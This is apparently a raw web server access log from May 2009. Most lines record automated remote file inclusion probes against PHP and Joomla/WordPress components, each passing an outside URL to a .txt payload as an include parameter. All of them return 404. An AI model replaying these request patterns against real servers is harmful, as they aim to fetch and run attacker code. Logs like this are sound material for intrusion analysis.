74.55.156.2 - - [13/May/2009:06:13:35 -0400] "GET //admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:06:13:35 -0400] "GET /logs//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.820"
85.214.83.196 - - [13/May/2009:06:13:48 -0400] "GET /logs/access_log.Q108062800//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.69"
85.214.83.196 - - [13/May/2009:06:13:48 -0400] "GET //admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.69"
85.214.83.196 - - [13/May/2009:06:13:48 -0400] "GET /logs//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.69"
69.94.30.156 - - [13/May/2009:06:13:57 -0400] "GET /logs/access_log.Q108062800//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
201.234.41.5 - - [13/May/2009:06:14:07 -0400] "GET /logs/access_log.Q108062800//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:06:14:07 -0400] "GET //admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:06:14:08 -0400] "GET /logs//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
74.55.156.2 - - [13/May/2009:06:14:18 -0400] "GET /logs/access_log.Q108102500//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.820"
69.94.30.156 - - [13/May/2009:06:14:27 -0400] "GET //admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
69.94.30.156 - - [13/May/2009:06:14:27 -0400] "GET /logs//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
84.32.195.2 - - [13/May/2009:06:14:30 -0400] "GET /logs/access_log.Q108082700//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
84.32.195.2 - - [13/May/2009:06:14:30 -0400] "GET /logs/access_log.Q108081200//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.214.83.196 - - [13/May/2009:06:14:36 -0400] "GET /logs/access_log.Q108102500//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.69"
209.59.12.99 - - [13/May/2009:06:15:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.234.41.5 - - [13/May/2009:06:15:26 -0400] "GET /logs/access_log.Q108102500//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
69.94.30.156 - - [13/May/2009:06:15:39 -0400] "GET /logs/access_log.Q108102500//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:16:13 -0400] "GET /logs/access_log.Q108122800%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:16:13 -0400] "GET /logs/access_log.Q108112900%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
201.234.41.5 - - [13/May/2009:06:16:54 -0400] "GET /logs/error_log.Q108032500//update/update5.php?lang=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:06:16:55 -0400] "GET //update/update5.php?lang=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:06:16:55 -0400] "GET /logs//update/update5.php?lang=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
200.32.100.130 - - [13/May/2009:06:17:09 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:17:09 -0400] "GET /logs/access_log.Q109022600//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:17:09 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
213.1.217.226 - - [13/May/2009:06:17:13 -0400] "GET /index.php?sayfa=http://www.rcds-essen.de/images/freeman.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
216.117.191.71 - - [13/May/2009:06:17:30 -0400] "GET /logs/access_log.Q108090400//vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:06:17:30 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:06:17:30 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
201.234.41.5 - - [13/May/2009:06:17:41 -0400] "GET /logs/access_log.Q109012500//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
84.201.208.50 - - [13/May/2009:06:18:09 -0400] "GET /logs/access_log.Q108121300%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:18:13 -0400] "GET /logs/access_log.Q108081200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:18:13 -0400] "GET /logs/access_log.Q108012500/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.150.79.146 - - [13/May/2009:06:18:19 -0400] "GET /logs/access_log.Q108072200%20%20//phpraid/auth/auth.php?smf_root_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.150.79.146 - - [13/May/2009:06:18:19 -0400] "GET /logs//phpraid/auth/auth.php?smf_root_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.150.79.146 - - [13/May/2009:06:18:19 -0400] "GET //phpraid/auth/auth.php?smf_root_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:18:19 -0400] "GET /logs/access_log.Q108081200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:18:19 -0400] "GET /logs/access_log.Q108012500/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:18:40 -0400] "GET /logs/access_log.Q108012500/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:06:18:40 -0400] "GET /logs/access_log.Q108081200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
91.121.210.42 - - [13/May/2009:06:18:53 -0400] "GET /logs/access_log.Q108090100//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.121.210.42 - - [13/May/2009:06:18:53 -0400] "GET /logs/access_log.Q108082700//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.94.30.156 - - [13/May/2009:06:19:00 -0400] "GET /logs/error_log.Q108032500//update/update5.php?lang=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
69.94.30.156 - - [13/May/2009:06:19:00 -0400] "GET //update/update5.php?lang=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
69.94.30.156 - - [13/May/2009:06:19:00 -0400] "GET /logs//update/update5.php?lang=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
74.55.156.2 - - [13/May/2009:06:19:20 -0400] "GET /logs/access_log.Q108090500/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
88.191.103.144 - - [13/May/2009:06:19:20 -0400] "GET /logs/access_log.Q108090400//vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.825"
88.191.103.144 - - [13/May/2009:06:19:20 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.825"
88.191.103.144 - - [13/May/2009:06:19:21 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.825"
69.94.30.156 - - [13/May/2009:06:19:21 -0400] "GET /logs/access_log.Q109012500//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
213.1.217.226 - - [13/May/2009:06:19:34 -0400] "GET /index.php?sayfa=http://www.rcds-essen.de/images/freeman.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
218.150.79.146 - - [13/May/2009:06:19:56 -0400] "GET /logs/access_log.Q108081200%20%20//phpraid/auth/auth.php?smf_root_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
172.16.1.157 - - [13/May/2009:06:20:36 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:20:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:20:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
121.101.159.29 - - [13/May/2009:06:20:41 -0400] "GET /logs/access_log.Q108082400//jscript.php?my_ms[root]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
121.101.159.29 - - [13/May/2009:06:20:41 -0400] "GET /logs//jscript.php?my_ms[root]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
121.101.159.29 - - [13/May/2009:06:20:41 -0400] "GET //jscript.php?my_ms[root]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
121.101.159.29 - - [13/May/2009:06:20:42 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
121.101.159.29 - - [13/May/2009:06:20:43 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
121.101.159.29 - - [13/May/2009:06:20:43 -0400] "GET /logs/access_log.Q109050800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
121.101.159.29 - - [13/May/2009:06:20:46 -0400] "GET /logs/access_log.Q108121900//jscript.php?my_ms[root]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
91.121.210.42 - - [13/May/2009:06:21:12 -0400] "GET /logs/access_log.Q108081200//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
172.16.1.157 - - [13/May/2009:06:21:50 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:21:50 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:06:21:50 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
218.185.20.88 - - [13/May/2009:06:22:15 -0400] "GET /logs/access_log.Q109011600/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:22:15 -0400] "GET /logs/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:22:15 -0400] "GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:22:19 -0400] "GET /logs/access_log.Q108081200/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.214.83.196 - - [13/May/2009:06:22:26 -0400] "GET /logs//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.69"
85.214.83.196 - - [13/May/2009:06:22:26 -0400] "GET //admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.69"
218.185.20.88 - - [13/May/2009:06:22:26 -0400] "GET /logs/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:22:26 -0400] "GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:22:26 -0400] "GET /logs/access_log.Q109011600%20%20/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:22:36 -0400] "GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:22:36 -0400] "GET /logs/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:22:36 -0400] "GET /logs/access_log.Q109011600/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:22:41 -0400] "GET /logs/access_log.Q108081200/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.101.159.29 - - [13/May/2009:06:22:42 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
121.101.159.29 - - [13/May/2009:06:22:42 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
121.101.159.29 - - [13/May/2009:06:22:42 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
121.101.159.29 - - [13/May/2009:06:22:47 -0400] "GET /logs/access_log.Q108100400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
121.101.159.29 - - [13/May/2009:06:23:00 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
121.101.159.29 - - [13/May/2009:06:23:00 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
121.101.159.29 - - [13/May/2009:06:23:00 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
121.101.159.29 - - [13/May/2009:06:23:03 -0400] "GET /logs/access_log.Q108100400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
121.101.159.29 - - [13/May/2009:06:23:08 -0400] "GET /logs/error_log.Q109050800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
85.119.158.133 - - [13/May/2009:06:23:28 -0400] "GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:23:28 -0400] "GET /logs/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:23:28 -0400] "GET /logs/access_log.Q109011600%20%20/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:23:29 -0400] "GET /logs/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:23:29 -0400] "GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:23:29 -0400] "GET /logs/access_log.Q109011600/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:23:34 -0400] "GET /logs/access_log.Q108081200/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:23:37 -0400] "GET /logs/access_log.Q108081200%20%20/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:23:54 -0400] "GET /logs/access_log.Q109011600/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:23:54 -0400] "GET /logs/access_log.Q108081200/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.101.159.29 - - [13/May/2009:06:24:14 -0400] "GET /logs/access_log.Q108091000//jscript.php?my_ms[root]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
85.119.158.133 - - [13/May/2009:06:24:17 -0400] "GET /logs/access_log.Q109011600%20%20/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:06:24:17 -0400] "GET /logs/access_log.Q108081200%20%20/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:24:20 -0400] "GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:24:20 -0400] "GET /logs/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:24:20 -0400] "GET /logs/access_log.Q109011600/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:24:29 -0400] "GET /logs/access_log.Q108081200/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.106.135.14 - - [13/May/2009:06:24:36 -0400] "GET /logs//vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:06:24:37 -0400] "GET //vwar/admin/admin.php?vwar_root=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
218.150.79.146 - - [13/May/2009:06:24:39 -0400] "GET /logs/access_log.Q108072200//phpraid/auth/auth.php?smf_root_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
121.101.159.29 - - [13/May/2009:06:24:59 -0400] "GET /logs/access_log.Q108101000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
121.101.159.29 - - [13/May/2009:06:25:15 -0400] "GET /logs/access_log.Q108101000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
217.18.76.16 - - [13/May/2009:06:25:18 -0400] "GET /logs/error_log.Q108032500//update/update5.php?lang=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:06:25:19 -0400] "GET //update/update5.php?lang=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:06:25:19 -0400] "GET /logs//update/update5.php?lang=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
218.150.79.146 - - [13/May/2009:06:25:27 -0400] "GET /logs/access_log.Q109050900//phpraid/auth/auth.php?smf_root_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
217.18.76.16 - - [13/May/2009:06:25:31 -0400] "GET /logs//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:06:25:31 -0400] "GET //admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
121.101.159.29 - - [13/May/2009:06:25:45 -0400] "GET /logs/access_log.Q108112400//jscript.php?my_ms[root]=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
202.89.33.167 - - [13/May/2009:06:25:50 -0400] "GET /logs/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:06:25:50 -0400] "GET /logs/access_log.Q109011600%20%20/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:06:25:50 -0400] "GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
